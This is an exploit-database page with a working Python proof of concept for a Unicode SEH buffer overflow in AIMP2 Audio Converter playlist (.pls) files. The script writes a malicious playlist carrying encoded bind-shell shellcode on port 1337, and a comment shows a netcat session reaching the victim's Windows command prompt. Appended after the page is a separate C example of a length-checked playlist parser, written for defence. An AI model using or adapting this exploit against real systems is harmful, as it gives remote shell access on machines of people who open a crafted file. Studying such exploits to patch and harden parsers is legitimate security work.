0day.today - Biggest Exploit Database in the World.
AIMP2 Audio Converter <= 2.53 build 330 Playlist (.pls) Unicode BOF
===================================================================

# Title: AIMP2 Audio Converter <= 2.53 build 330 Playlist (.pls) Unicode BOF
# CVE-ID: (CVE-2009-3170)
# OSVDB-ID: ()
# Author: mr_me
# Published: 2009-11-21
# Verified: yes

#!/usr/bin/python
#
# ######################################################################
#
# *** For educational purposes only ***
# You have been warned
#
# My original crash breakdown:
#
# EAX 001B0020 UNICODE "AAAAAAAAAAAAAAAAAAAA~
# ECX 00000273
# EDX 00000C4C
# EBX 00000000
# ESP 0012DCA8
# EBP 0012DD64
# ESI 001B6610 UNICODE "AAAAAAAAAAAAAAAAAAAA~
# EDI 00130000 ASCII "Actx "
# EIP 004530C6 AIMP2.004530C6
#
# And then when we pass the exception handler to overwrite EIP...
#
# EIP 00410041
#
# The Info:
#
# I knew this exploit was always possible, but I failed to have the knowledge
# and experience to complete it. Many thanks go to corelanc0d3r for
# demonstrating this unicode concept on his blog. I downloaded his PoC, however it
# did not work on my VM, so I remade it with some fun shellcode :)
#
# Visit corelanc0d3r's blog: http://www.corelan.be:8800/
#
# root@home:/home/mrme# nc -v 192.168.2.6 1337
# 192.168.2.6: inverse host lookup failed: Unknown server error : Connection timed out
# (UNKNOWN) [192.168.2.6] 1337 (?) open
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\AIMP2\Langs>
#
# Metasploit bind shell on port 1337
# Encoded using Skylined's alpha2 encoder
shellcode = ("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQA"
             "IAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1"
             "111AIAJQI1AYAZBABABABAB30APB944JBKLQZJKPMK8JYKOKOKOQPTK"
             "2LMTMTDKOUOLTKCLKUT8M1JOTKPOLXTKQOMPM1JKOY4KNTTKM1JNNQ9"
             "04Y6LU4I0D4M77QHJLMKQ92ZKL4OK0TMTO8BUIUTK1OO4KQZK1VDKLL"
             "PKTKQOMLM1ZKM3NLTKU9RLMTMLQQ7SNQ9KQTTK0CNP4KOPLL4KRPMLV"
             "M4KOPLHQN384NPNLNJLPPKOJ6QVPSQVQX03OBRHT7RSNR1OB4KO8PBH"
             "XKZMKLOKR0KOHVQOU9YU1VE1JMM8KRB5QZLBKOXPBH8YM9JUFMQGKOZ"
             "6PSPSR30SQCPC23PCPSKOXPC6RHKUP936PSSYYQV5QX5TMJ40GWPWKO"
             "8VRJLPR1R5KOHPQXG4VMNNIY0WKOZ6QC25KOXPBH9U19U6OY27KO9FP"
             "PR4R41EKOXPUC1X9W49GVRYPWKO8V0UKOXP1VQZRD2FQXQSBMU9YUQZ"
             "0PPYNI8LTI9W2J14U9K201GPKCUZKNORNMKNPBNL63TM2ZNXVKFK6KQ"
             "XBRKNVSN6KOT5Q4KOIFQK0WB2PQ0Q0Q1ZM1PQR1PUR1KOXPRHVMJ9KU"
             "8NQCKOHVQZKOKO07KOZ0DK0WKLTCWTRDKOHV0RKO8P38JPTJKTQOR3K"
             "O8VKO8PKZA")

# Minimal .pls header; the overlong File1= value is what the converter mishandles
header = ("[playlist]\nNumberOfEntries=3\n\n")
header += ("File1=")

crash = ('\x41' * 1985)                  # offset before shellcode
crash += shellcode                       # add the shellcode
crash += ('\41' * (4033-len(crash)))     # remaining offset (1st block); '\41' is an octal escape ('!'), padding only
crash += ('\x41\x6d')                    # inc ecx + add byte ptr [ebp],ch
crash += ('\x0e\x45')                    # seh handler (p/p/r in aimp2.dll)

# We needed an address that is located at or close to our shellcode
# We find one on the fourth address from the stack
align = '\x58'                           # pop eax
align += '\x6d'
align += '\x58'                          # pop eax
align += '\x6d'
align += '\x58'                          # pop eax
align += '\x6d'
align += '\x58'                          # pop eax
align += '\x6d'

# Here we adjust the value of eax to the address of where our shellcode
# is.. (in the original buffer)
align += '\x05\x02\x22'                  # add eax,22000200
align += '\x6d'
align += '\x2d\x09\x11'                  # sub eax,11000900
align += '\x6d'
align += '\x2d\x09\x11'                  # sub eax,11000900
align += '\x6d'

# Eax now equals 0x0012EDA0 which is the location of our shellcode. We push
# eax onto the stack and return into it so it is executed
jump = '\x50'                            # push eax
jump += '\x6d'
jump += '\xc3'                           # ret: pops the pushed eax into eip (effectively jmp eax)

finish = ('\x42' * (963-len(align)-len(jump)))

buffer = header + crash + align + jump + finish + '\n'

with open('mr_me_owns_aimp.pls', 'w') as f:
    f.write(buffer)
print("[+] mr_me_owns_aimp.pls file created successfully")

# 0day.today [2024-07-07] #
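The PoC above works because the playlist reader copies an oversized `File1=` value into a fixed-size buffer without checking its length, so the excess bytes run over the SEH record. The following is an added example, not code from the page, from AIMP, or from the PoC author, showing what the parser side should have done: each `FileN=` value is parsed with an explicit length check and an entry that does not fit is reported as an error instead of being written past the end of the buffer. The 260-byte limit (`PLS_MAX_PATH`) and the sample playlists are constructed for this example; the page does not state the real buffer size inside AIMP2.

```c
#include <stdio.h>
#include <string.h>

/* Upper bound for one FileN= value.  Constructed limit for this example; the
   page does not state the size of the buffer AIMP2 actually overflowed. */
#define PLS_MAX_PATH 260

enum pls_status { PLS_OK = 0, PLS_IGNORED = 1, PLS_TOO_LONG = -1, PLS_BAD_LINE = -2 };

/* Parse one playlist line of exactly line_len bytes (no trailing newline).
   "FileN=value" copies the value into out only if it fits, including the
   terminating NUL; anything else is reported instead of written past the
   end of out, which is the defect the PoC above relies on. */
enum pls_status pls_parse_file_line(const char *line, size_t line_len,
                                    char *out, size_t out_len)
{
    if (line == NULL || out == NULL || out_len == 0) return PLS_BAD_LINE;
    if (line_len < 5 || memcmp(line, "File", 4) != 0) return PLS_IGNORED;
    size_t i = 4;
    if (line[i] < '0' || line[i] > '9') return PLS_IGNORED;   /* e.g. "Filename=" */
    while (i < line_len && line[i] >= '0' && line[i] <= '9') i++;
    if (i >= line_len || line[i] != '=') return PLS_BAD_LINE; /* "File1" with no '=' */
    i++;
    size_t n = line_len - i;
    if (n > 0 && line[i + n - 1] == '\r') n--;                 /* tolerate CRLF */
    if (n >= out_len) return PLS_TOO_LONG;                     /* leave room for NUL */
    memcpy(out, line + i, n);
    out[n] = '\0';
    return PLS_OK;
}

/* Walk a whole playlist.  Returns the number of accepted FileN= entries, or -1
   as soon as one entry is oversized or malformed, so nothing after it is used. */
int pls_count_entries(const char *playlist)
{
    char path[PLS_MAX_PATH];
    int count = 0;
    const char *line = playlist;
    while (*line != '\0') {
        size_t len = strcspn(line, "\n");
        enum pls_status st = pls_parse_file_line(line, len, path, sizeof path);
        if (st == PLS_OK) count++;
        else if (st != PLS_IGNORED) return -1;
        line += len;
        if (*line == '\n') line++;
    }
    return count;
}

/* Convenience wrapper for a single NUL-terminated line without its newline. */
enum pls_status pls_line_status(const char *line)
{
    char path[PLS_MAX_PATH];
    return pls_parse_file_line(line, strlen(line), path, sizeof path);
}

/* Constructed sample inputs: a normal two-track playlist, and one whose first
   entry is padded with thousands of 'A's the way the PoC pads File1=. */
int demo_benign_count(void)
{
    const char *pls = "[playlist]\r\nNumberOfEntries=2\r\n\r\n"
                      "File1=C:\\music\\one.mp3\r\nTitle1=One\r\n"
                      "File2=C:\\music\\two.mp3\r\nTitle2=Two\r\n";
    return pls_count_entries(pls);
}

int demo_oversized_count(void)
{
    static char pls[64 + 4096 + 2];
    const char *head = "[playlist]\nNumberOfEntries=1\n\nFile1=";
    size_t h = strlen(head);
    memcpy(pls, head, h);
    memset(pls + h, 'A', 4096);          /* far beyond PLS_MAX_PATH */
    pls[h + 4096] = '\n';
    pls[h + 4096 + 1] = '\0';
    return pls_count_entries(pls);
}

int main(void)
{
    printf("benign playlist: %d entries accepted\n", demo_benign_count());
    printf("oversized entry: %d (playlist rejected)\n", demo_oversized_count());
    return 0;
}
```

The length check is made against `out_len` before `memcpy`, and the CR is stripped before the comparison so a CRLF file is not rejected by one byte; the caller treats `PLS_TOO_LONG` and `PLS_BAD_LINE` as a reason to stop reading the file rather than skip the line, which is the safer default for a format that is handed to the player by double-click.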